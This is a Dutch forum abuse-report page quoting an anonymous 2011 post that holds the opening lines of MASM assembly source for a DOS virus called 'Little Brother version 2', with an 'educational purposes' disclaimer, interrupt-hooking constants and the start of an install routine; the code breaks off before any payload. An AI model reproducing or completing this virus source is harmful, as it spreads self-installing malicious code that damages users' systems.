Abuse Melding

Je hebt een klacht over de onderstaande posting:

04-06-2011, 20:50 door Anoniem

;**************************************************************************** ;* Little Brother version 2 ;* ;* Compile with MASM 4.0 ;* (other assemblers will probably not produce the same result) ;* ;* Disclaimer: ;* This file is only for educational purposes. The author takes no ;* responsibility for anything anyone does with this file. Do not ;* modify this file! ;**************************************************************************** cseg segment assume cs:cseg,ds:cseg,es:nothing .RADIX 16 FILELEN equ end - begin RESPAR equ (FILELEN/16d) + 17d VERSION equ 2 oi21 equ end nameptr equ end+4 DTA equ end+8 ;**************************************************************************** ;* Install the program! ;**************************************************************************** org 100h begin: ...

Beschrijf je klacht (Optioneel):

captcha